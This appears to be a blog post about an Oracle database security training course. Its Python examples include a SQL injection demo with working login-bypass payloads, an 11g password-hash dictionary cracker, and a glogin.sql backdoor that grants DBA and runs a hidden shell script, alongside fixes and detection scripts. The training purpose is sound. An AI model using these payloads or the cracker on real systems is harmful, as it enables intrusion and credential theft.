Having a ball with the hacking training

Today I did my third out of four database hacking sessions at work and I have to say that, once again, it was a lot of fun. It sure did raise security awareness. My four-hour training consists of the following workshop exercises:

SQL injection
For this exercise I have a very small Java application, written by an old colleague of mine. You have to log on with a user name and password, but both input fields are vulnerable to SQL injection. After doing the SQL injection exercise, people usually ask "you are going to tell us how this works, aren't you?". And of course I do.
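
What the students are shown is the difference between a logon query glued together from the two input fields and the same query with bind variables. The following is an added example, not the colleague's Java application: it uses Python with an in-memory SQLite table (constructed here, with made-up accounts) in place of the Java/Oracle app, but the injection and the fix are the same.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the training app's user table (not the real app)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO app_users VALUES (?, ?)",
        [("scott", "tiger"), ("admin", "Xq7!pL2wqs")],
    )
    return conn

def login_vulnerable(conn, username, password):
    """Logon check built by string concatenation: both fields are injectable."""
    sql = (
        "SELECT username FROM app_users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(conn, username, password):
    """Same check with bind variables: the input is treated as data, never as SQL."""
    sql = "SELECT username FROM app_users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    conn = make_db()
    # Comment the password check out of the query through the user name field ...
    print(login_vulnerable(conn, "admin' --", "whatever"))   # admin
    # ... or make the WHERE clause always true through the password field.
    print(login_vulnerable(conn, "nobody", "' OR '1'='1"))   # scott
    print(login_fixed(conn, "admin' --", "whatever"))         # None
    print(login_fixed(conn, "nobody", "' OR '1'='1"))         # None
```

Both payloads work unchanged against Oracle as well, since `--` starts a comment there too; the bind-variable version (a `PreparedStatement` in the Java app) is the fix in either database.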

Port scanning with Nmap.
In this exercise they use the oracle-sid-brute Nmap script to guess the SIDs of the Oracle instances behind a listener, and oracle-enum-users (which needs one of those SIDs) to find existing users in the Oracle database.

Network sniffing with Wireshark.
"I was quite surprised that with alter user .. identified by statements, the password goes over the network unencrypted", was one reaction to the exercise. In it I let the students change the password of SCOTT with "alter user .. identified by .." and with the SQL*Plus password command (it exists!) and see what goes over the network encrypted and what does not.
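
The reason the students can read the password in Wireshark is that an ALTER USER statement is just SQL text inside a TNS data packet. As an added example (not part of the training material), here is a small Python check that finds such statements in a packet payload and masks the password before the packet is kept in a log. The two payloads are constructed, not real captures: a few filler bytes stand in for the TNS/TTC framing, and the "password command" packet simply carries no statement text, which is what distinguishes it in the exercise.

```python
import re

# One pattern covers ALTER USER and CREATE USER. User name and password may be a
# bare word or a double-quoted string (which may contain spaces).
_IDENT = rb'"[^"]*"|[^\s;]+'
STMT_RE = re.compile(
    rb"\b(alter|create)\s+user\s+(" + _IDENT + rb")\s+identified\s+by\s+(" + _IDENT + rb")",
    re.IGNORECASE,
)

def find_cleartext_passwords(payload: bytes):
    """Return (statement, user, password) for every password-setting statement
    that travels as plain text inside a TNS data packet payload."""
    hits = []
    for m in STMT_RE.finditer(payload):
        kind, user, pw = (g.decode("latin-1") for g in m.groups())
        hits.append((kind.lower(), user.strip('"'), pw.strip('"')))
    return hits

def redact_passwords(payload: bytes) -> bytes:
    """Mask the password so the packet can be kept in a log or pcap excerpt."""
    def _mask(m):
        keep = m.start(3) - m.start(0)          # everything up to the password
        return m.group(0)[:keep] + b"********"
    return STMT_RE.sub(_mask, payload)

# Constructed payloads (not real captures). The filler bytes mimic TNS framing;
# the SQL text is what the exercise sees in Wireshark.
ALTER_PACKET = (b"\x00\x3c\x00\x00\x06\x00\x00\x00\x00\x00\x03\x5e"
                + b"alter user SCOTT identified by tiger2012")
# The SQL*Plus password command does not send the statement as text, so a
# packet from it contains nothing for the pattern to match.
PASSWORD_CMD_PACKET = b"\x00\x40\x00\x00\x06\x00\x00\x00\x00\x00" + bytes(range(0x80, 0xB0))

if __name__ == "__main__":
    print(find_cleartext_passwords(ALTER_PACKET))         # [('alter', 'SCOTT', 'tiger2012')]
    print(find_cleartext_passwords(PASSWORD_CMD_PACKET))  # []
    print(redact_passwords(ALTER_PACKET)[12:])            # b'alter user SCOTT identified by ********'
```

The same pattern run over a TCP stream export from Wireshark (port 1521) gives a quick inventory of every password that went across in the clear; the remedy on the DBA side is the password command or Oracle Net encryption rather than ALTER USER in an unencrypted session.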

Password cracking with woraauthbf.
I was actually amazed how incredibly fast dictionary attacks with this tool are, when I wrote and tested the exercise. With a dictionary of 2 MB it finds dictionary passwords in 0 seconds!
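
Why is it so fast? A dictionary attack is one hash per candidate, and the 11g password hash (the "S:" value in SYS.USER$.SPARE4) is a single SHA-1 over the password followed by a 10-byte salt. The following is an added example in Python, not woraauthbf's code: it builds such a hash for a constructed account and runs a dictionary with a few mangling rules against it. The word list and the account are made up for the demonstration.

```python
import hashlib
import os
import time

SUFFIXES = ("", "1", "12", "123", "2011", "2012")

def mangle(word):
    """Common mangling rules: case variants combined with digit suffixes."""
    for base in (word, word.upper(), word.capitalize()):
        for suffix in SUFFIXES:
            yield base + suffix

def oracle11g_hash(password: str, salt: bytes) -> str:
    """Build an 11g 'S:' hash as stored in SYS.USER$.SPARE4:
    SHA-1 over the password bytes followed by a 10-byte salt, then the salt, all hex."""
    if len(salt) != 10:
        raise ValueError("the 11g salt is 10 bytes")
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest()
    return "S:" + (digest + salt.hex()).upper()

def parse_11g_hash(value: str):
    """Split 'S:' + 40 hex digest chars + 20 hex salt chars into (digest, salt)."""
    if not value.startswith("S:") or len(value) != 62:
        raise ValueError("not an 11g S: hash")
    return bytes.fromhex(value[2:42]), bytes.fromhex(value[42:])

def dictionary_attack(hash_value: str, wordlist):
    """Return (password, candidates_tried); password is None if the list misses."""
    digest, salt = parse_11g_hash(hash_value)
    tried = 0
    for word in wordlist:
        for candidate in mangle(word):
            tried += 1
            if hashlib.sha1(candidate.encode("utf-8") + salt).digest() == digest:
                return candidate, tried
    return None, tried

if __name__ == "__main__":
    # Constructed: a freshly salted hash for the classic scott/tiger account.
    target = oracle11g_hash("tiger", os.urandom(10))
    wordlist = ["password", "oracle", "welcome", "tiger", "manager"]  # constructed
    t0 = time.perf_counter()
    found, tried = dictionary_attack(target, wordlist)
    print(found, tried, "candidates in %.4f s" % (time.perf_counter() - t0))
```

Even this unoptimised version tests hundreds of thousands of candidates per second, so a 2 MB word list is gone in well under a second; a tool written in C with the DES-based 10g hash does the same at a much higher rate. Note that 11g passwords are case sensitive, so the mangling rules matter: "tiger" in the list still recovers "Tiger123".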

Access to the OS
Here we have a database user with "just" the CREATE LIBRARY privilege. We create a library object pointing at /lib/libc-2.x.so, and by calling its system() function through an external procedure we can now run shell commands on the database server. Adding a few lines with "grant dba to hacker;" to $ORACLE_HOME/sqlplus/admin/glogin.sql usually makes the students smile. Just wait until the DBA logs in with SQL*Plus.
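
The glogin.sql trick works because SQL*Plus runs that file silently, with the privileges of whoever logs in. A DBA can catch it by checking that the site profile only sets up the session. The following is an added example, not part of the training: a Python audit that flags any line in a glogin.sql (or a user's login.sql) that grants privileges, changes users, runs OS commands, starts other scripts or executes SQL. The sample file is constructed for the demonstration; the rule set is my own assumption about what a stock profile should and should not contain.

```python
import re
import sys

# Each rule: a label and a pattern matched against the start of a trimmed line.
RULES = [
    ("privilege change", re.compile(r"(grant|revoke)\b", re.I)),
    ("user or password change", re.compile(r"(alter|create)\s+user\b", re.I)),
    ("OS command", re.compile(r"(host\b|!)", re.I)),
    ("runs another script", re.compile(r"(@|start\b)", re.I)),
    ("SQL or PL/SQL statement", re.compile(
        r"(create|alter|drop|insert|update|delete|execute|exec|begin|declare|call)\b", re.I)),
]

def audit_glogin(text: str):
    """Return (line_no, label, line) for every line that does more than set up the session."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("--") or line.lower().startswith("rem "):
            continue                      # blank lines and comments are fine
        for label, pattern in RULES:
            if pattern.match(line):
                findings.append((no, label, line))
                break
    return findings

# Constructed sample: a stock-looking glogin.sql with two appended lines of the
# kind an attacker with OS access on the database server would leave behind.
SAMPLE_GLOGIN = """\
-- glogin.sql: site profile for SQL*Plus
set pagesize 60
SET linesize 200
define _editor=vi
column status format a10
grant dba to hacker;
host /tmp/.update.sh >/dev/null 2>&1
"""

if __name__ == "__main__":
    # Usage: python audit_glogin.py $ORACLE_HOME/sqlplus/admin/glogin.sql
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GLOGIN
    for no, label, line in audit_glogin(text):
        print("line %d: %s: %s" % (no, label, line))
```

Run it against $ORACLE_HOME/sqlplus/admin/glogin.sql and every login.sql on the SQLPATH of the accounts that use SQL*Plus as SYSDBA; anything it reports should be explained by the DBA, not by "it must have always been there". Multi-line statements are not handled, so a suspicious `begin` on one line is reported, but the lines that follow it are not.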

There's also the Java exploit that David Litchfield once showed at Black Hat 2010.


Now I've been at the RAC Attack at UKOUG 2011. It's a free curriculum and platform to learn to set up a RAC database cluster. So I've been thinking: how about a Hack Attack platform? A platform where you can learn skills like the above. It'll be hard for students to get around needing a genuine Oracle database, but otherwise there are lots of things to do with an 11.2 database. I'd like to know what you think about this, so please leave a response.


About Marcel-Jan Krijgsman

Marcel-Jan is the PR officer of the Werkgroep Maan en Planeten. He also takes care of the news on the Facebook page and this blog.
This entry was posted in Oracle security. Bookmark the permalink.

1 Response to Having a ball with the hacking training

  1. Pingback: My new role as “product responsible” | Marcel-Jan's Oracle Blog
